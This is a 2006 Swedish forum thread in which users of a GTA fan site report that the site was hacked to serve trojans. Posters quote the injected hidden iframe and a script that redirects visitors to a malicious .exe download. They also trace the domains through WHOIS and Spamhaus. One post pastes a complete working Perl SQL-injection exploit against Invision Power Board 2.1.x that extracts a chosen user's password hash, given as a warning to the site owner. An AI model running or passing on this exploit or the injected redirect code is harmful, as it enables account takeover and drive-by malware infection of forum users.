Trojans häst av gtasajten!

[rabarben]

NÄr jag går in på gtasajten så kommer en liten ruta upp och om man trycker på den så får man trojanska hästar. Jag har fått ett program och det kommer några stycken trojaner nu som t.ex. paytime.exe.

Här står det om trojanen!

Redigerad 2 maj, 2006 av rabarben

[SlewME]

Ja! RÅDER ALLA TILL ATT INTA TANKA DEN!

[rabarben]

Har startat en full system scan... hoppas jag får bort den. Tror ni sajten har blevet hackad elle r nåt?

[SlewME]

Har startat en full system scan... hoppas jag får bort den. Tror ni sajten har blevet hackad elle r nåt?

Trojanen har hackat kod i sajten ja. Alla får upp den där. Mitt antivirus informerade om att "terminate" filen.

[StellHell]

can confirm the site has been hacked with the same hack as before, IFRAME in the User header linking to the exploit.

Using a different browser is not the solution, getting rid of the goddamn virus is

And why isn't that shit ass traffsale.biz site SHUT DOWN! These adware people are the scourge of the earth. I would like to break all of their fingers for coding this shit.

Indeed, the board seems to have been exploited. Viewing the source yields this:

CODE

<iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe>

The URL in particular redirects to an affrontgl.com-address. Seems like it generates a unique one too, how considerate...

However, the affrontgl.com nameservers seem quite unresponsive. Let's see if we can figure out more about them...

CODE

  Domain Name: AFFRONTGL.COM

  Registrar: ONLINE SAS

  Whois Server: whois.bookmyname.com

  Referral URL: http://www.bookmyname.com

  Name Server: AA.CHARISMDE.COM

  Name Server: BB.CHARISMDE.COM

  Status: ACTIVE

  Updated Date: 05-mar-2006

  Creation Date: 19-feb-2006

  Expiration Date: 19-feb-2007

AA.CHARISMDE.COM        A      219.72.229.209

bb.charismde.com        A      220.248.227.112

Searching for nameservers with the same IP as the secondary yields the following:

CODE

BB.COBBLYEA.COM

BB.CHARISMDE.COM

DD.GROOMISHNL.COM

AA.HERDSMANIF.COM

AV.METEYARDBM.COM

RR.GUSSIELJ.COM

EE.VANGELIHN.COM

BB.GALLICEN.COM

CE.NICENISTCE.COM

Let's ask spamhaus.

CODE

219.72.229.209 is listed in the SBL, in the following records:

  SBL39300

Hmm, interesting (though not surprising). Let's see what they've been up to.

CODE

219.72.229.209/32 is listed on the Register Of Known Spam Operations (ROKSO) database as being assigned to, under the control of, or providing service to a known professional spam operation

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL39300

Bah, spammers.

Looking up 196.regvista.com (85.255.115.196) yields another record, SBL36702...

CODE

DNSChanger Trojan home

http://vil.mcafeesecurity.com/vil/content/v_136602.htm

Symptoms

* Presence of the file:

o %SYSTEMROOT%\SYSTEM32\HGQHP.EXE

* Having DNS entries in any of your network adaptors with the values:

o 85.255.112.132

o 85.255.113.13

* Finding traffic targeting:

o 195.95.218.100

Hultan, var är du?

[GiZmo]

Usch..

Längst ner i sidans källkod:

<iframe src="index.php-filer/adv721.htm" height="1" width="1"></iframe>



<script language="JavaScript">window.location.href = "http://traffsale1.biz/dl/loadadv721.exe"</script>

[tommy killer]

Tänkte precis göra en topic om detta nu när jag kom hem efter skolan.

Men tur arr mit SP2 varnade mig för att ladda ner filen.

[Tackleberry]

Laddade man ner den får man fan skylla sig själv. Lite bör man ju kunna lista ut...

[SlewME]

Laddade man ner den får man fan skylla sig själv. Lite bör man ju kunna lista ut...

Måste hålla med dig. Det är inte ofta man lägger ut en fil för nerladdning rakt upp och ned på en hemsida om det inte är något lurt.

[iweX]

Hur blir man av med den då?

[LoneWolF]

Jag varnade Hultan för det här (eller så beror det på något annat) igår men han lyssnade/läste inte. Orsaken är förmodligen som följer:

Idag gjordes en exploit tillgänglig till IPB-forumen. Jag ser att du inte visar direkt vilken version du kör men de som är kända för att ha hålet är 2.1.4 och förmodligen också 2.1.5. Exploiten utnyttjar PM för att komma över lösenordshashar från databasen som kan användas för att logga in på andras konton eller crackas för att få ut lösenordet.

Jag rekommenderar att du antingen stänger ned forumet tills felet är fixat eller tillfälligt avaktiverar PM-funktionen.

Det här är allvar, jag driver inte med dig, det har jag aldrig gjort förut. Här är koden:

Invision Power Board <= 2.1.5 (from_contact) SQL Injection Exploit

#!/usr/bin/perl

#############################################################################

## IPB <=2.1.4 exploit (possibly 2.1.5 too)                                ##

## Brought to you by the Ykstortion security team.                         ##

##                                                                         ##

## The bug is in the pm system so you must have a registered user.         ##

## The exploit will extract a password hash from the forum's data base of  ##

## the target user.                                                        ##

## You need to know the target user's member ID but it's not difficult to  ##

## find out, just look under their avatar next to one of their posts.      ##

## Once you have the hash, simply unset all forum cookies and set          ##

## member_id to the target user's member id and pass_hash to the hash      ##

## obtained from the database by this script.                              ##

##                                                                         ##

## Usage:                                                                  ##

##   $ ./ipb                                                               ##

##   IPB Forum URL ? forums.example.com/forums                             ##

##   Your username ? krypt_sk1dd13                                         ##

##   Your pass ? if_your_on_nix_this_gets_hidden                           ##

##   Target userid ? 3637                                                  ##

##                                                                         ##

##   Attempting to extract password hash from database...                  ##

##   537ab2d5b37ac3a3632f5d06e8e04368                                      ##

##   Hit enter to quit.                                                    ##

##                                                                         ##

## Requirements:                                                           ##

##   o Perl 5                                                              ##

##   o LWP 5.64 or later                                                   ##

##   o Internet access                                                     ##

##   o A forum you hate/dislike                                            ##

##   o A user on said forum                                                ##

##   o 32+ PMs left till your inbox is full, if not you can still delete   ##

##     PMs from your inbox as the successful ones come through             ##

##                                                                         ##

## Credit to: Nuticulus for finding the SQL injection                      ##

##                                                                         ##

## Have fun, you dumb skiddie.                                             ##

#############################################################################


use HTTP::Cookies;

use LWP 5.64;

use HTTP::Request;


# variables

my $login_page = '?act=Login&CODE=01';

my $pm_page = '?act=Msg&CODE=04';

my $pose_pm_page = '?';

my $tries = 5;

my $sql = '';

my $hash = '';

my $need_null = 0;

my $i;

my $j;

my @charset = ('0' .. '9', 'a' .. 'f');

my %form = (act  => 'Msg',

	CODE  => '04',

	MODE  => '01',

	OID  => '',

	removeattachid	=> '',

	msg_title	=> 'asdf',

	bbmode  => 'normal',

	ffont  => 0,

	fsize  => 0,

	fcolor  => 0,

	LIST  => ' LIST ',

	helpbox  => 'Insert Monotype Text (alt + p)',

	tagcount	=> 0,

	Post  => 'jkl');



# objects

my $ua = LWP::UserAgent->new;

my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);

my $resp;


# init the cookie jar

$ua->cookie_jar ($cj);


# allow redirects on post requests

push @{ $ua->requests_redirectable }, "POST";


# get user input

print 'IPB Forum URL ? ';

chomp (my $base_url = <STDIN>);

print 'Your username ? ';

chomp (my $user = <STDIN>);

$form{entered_name} = $user;

print 'Your pass ? ';

# systems without stty will error otherwise

my $stty = -x '/bin/stty';

system 'stty -echo' if $stty;  # to turn off echoing

chomp (my $pass = <STDIN>);

system 'stty echo' if $stty;  # to turn it back on

print "\n" if $stty;

print 'Target userid ? ';	# it'll say next to one of their posts

chomp (my $tid = <STDIN>);


# parse the given base url

if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }

if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }


do {

	$resp = $ua->post ($base_url . $login_page,

  [ UserName => $user,

    PassWord => $pass,

    CookieDate => 1,

  ]);

} while ($tries-- && !$resp->is_success());


# reset tries

$tries = 5;


# did we get 200 (OK) ?

if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }


# was the pass right ?

if ($resp->content =~ /sorry, the password was wrong/i) {

	die "Error: password incorrect.\n";

}


# get ourselves a post_key (and an auth_key too with newer versions)

do {

	$resp = $ua->get ($base_url . $pm_page);

} while ($tries-- && !$resp->is_success());


# reset tries

$tries = 5;


if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }

if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#)

{

	$form{post_key} = $1;

} else {

	die "Error: couldn't get a post key.\n";

}

if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#)

{

	$form{auth_key} = $1;

}


# turn off buffering so chars in the hash show up straight away

$| = 1;


print "\nAttempting to extract password hash from database...\n ";


OFFSET:

for ($i = 0; $i < 32; ++$i) {

	CHAR:

	for ($j = 0; $j < @charset; ++$j) {

  # reset tries

  $tries = 5;

  print "\x08", $charset[$j];

  # build sql injection

  $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('

       . (join (',', map {ord} split ('', $user))) . ') FROM '

       . 'ibf_members WHERE id = ' . $tid . ' AND MID('

       . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR('

       . ord ($charset[$j]) . ')';

  $form{from_contact} = $sql;

  $resp = $ua->post ($base_url . $post_pm_page, \%form,

 	 referer => $base_url . $pm_page);

  if (!$resp->is_success()) {

 	 die "\nError: " . $resp->status_line

     . "\n" if (!$tries);

 	 --$tries;

 	 redo;

  }

  if ($resp->content =~ /sql error/i) {

 	 if ($need_null) {

    die "Error: SQL error.\n";

 	 } else {

    $need_null = 1;

    redo OFFSET;

 	 }

  } elsif ($resp->content !~ /there is no such member/i) {

 	 # we have a winner !

 	 print ' ';

 	 next OFFSET;

  }

	}

	# uh oh, something went wrong

	die "\nError: couldn't get a char for offset $i\n";

}

print "\x08 \x08\nHit enter to quit.\n";

<STDIN>;

Nu när koden till och med är publicerad publikt så MÅSTE någonting göras, varken medlemmarnas/moderatorernas/administratörernas konton, lösenord eller personliga uppgifter går säkra, nej inte ens webbservern verkar det som.

Ta forumet offline, avaktivera PM-systemet som en temporär fix och uppmana ALLA att byta lösenord när problemet är ur världen.

Redigerad 2 maj, 2006 av LoneWolF

[Vice.]

Kan någon berätta EXAKT VAD, det är som händer? Man fick upp ett erbjudande att ladda ner nått. Och?

Vad är det vi har att göra med? Är det ett virus som härjar på forumet som kan ta över ens konto? Och vad händer då?

Eller är detta bara en överdriven hysterì???

LoneWolF: Hur kännde DU till detta IGÅR??

[StellHell]

Kan någon berätta EXAKT VAD, det är som händer? Man fick upp ett erbjudande att ladda ner nått. Och?

Vad är det vi har att göra med? Är det ett virus som härjar på forumet som kan ta över ens konto? Och vad händer då?

Eller är detta bara en överdriven hysterì???

LoneWolF: Hur kännde DU till detta IGÅR??

Andra IPB forum blev infekterade igår och i förrgår.

[LoneWolF]

Det är inte överdrivet, databasen läcker lösenord från användarkonton samtidigt som en massa andra problem upptäckts. Varför gör ni inget? Medlemmarnas personliga data är ju i fara.

[SlewME]

Det är inte överdrivet, databasen läcker lösenord från användarkonton samtidigt som en massa andra problem upptäckts. Varför gör ni inget? Medlemmarnas personliga data är ju i fara.

Ja, mitt personnummer blandannat. Kommer det ut så stämmer jag den här sajten.

Hultan är extremt inaktiv och därför händer inget. Administratörerna på GTAsajten har inga förmåner att ändra på forumet eller sidan.

[-NightHawk-]

Det här är kanske det sjuka fenomenet så när den där grabben med den sjuka tråden skrev att "21.00 händer det" eller nåt sånt.

Qoutar mig själv från den andra tråden:

Tack gode Gud att jag har Norton! Gick in på GTAsajten nyss och ja den bara:

"Deleted trojan bla bla bla." Jag bara: Va? DAMN YOU BERKLEY! (nej, inte det) så om jag inte hade haft Norton så hade allting varit fucked upp. Fick ingen popup utan jag kom in och direkt kom meddelandet! 

Redigerad 2 maj, 2006 av -NightHawk-

[RadiuZ]

Är det fixat nu? Jag har nämligen inte fått något.

Använder Opera men enligt någon quote skulle inte det spela någon roll.

[Vice.]

Men har någon kontaktat Hultenius då?

StellHell, du nämde att du skulle göra det. Hur har du gjort det? Har han någon mail som han tittar i?

[StellHell]

Men har någon kontaktat Hultenius då?

StellHell, du nämde att du skulle göra det. Hur har du gjort det? Har han någon mail som han tittar i?

Har snokat på irc och msn utan resultat. Har även skickat ett par mail om han nu ser dom. Får se vad som händer.

[[B][O][T]]

Eftersom den andra tråden blev låst får Jag väl lägga in citaten här istället och svara på Vice's fråga.

Vi har inget med att skriva regler att göra. Bara Hultenius som har den möjligheten.

Tycker det är dåligt att Ni inte kan göra det, när Hultan inte är särskilt aktiv här

: Varför är det dåligt?! Vem är dem att ändra reglerna på ett ställe som de inte ens äger?

När en administratör inte är särskilt aktiv så borde någon annan kunna sköta det administrativa, det finns alltid något att fixa. Ta bara det som hände igår, hade någon annan utav adminen haft fullständig tillgång så hadde de lätt kunna göra forumet offline med ett meddelande om att forumet är temporärt stängt pga virus.

Och på det sättet stoppat att medlemmar får sina datorer infekterade.

Detta forum är så stort att det inte räcker med en admin, nu räknar jag inte med de som är admin (Stellan & KalleR) iom att de inte har tillgång till allt.

Så länge man kan lita på någon till 100% i alla lägen så ska det inte vara några problem.

BOT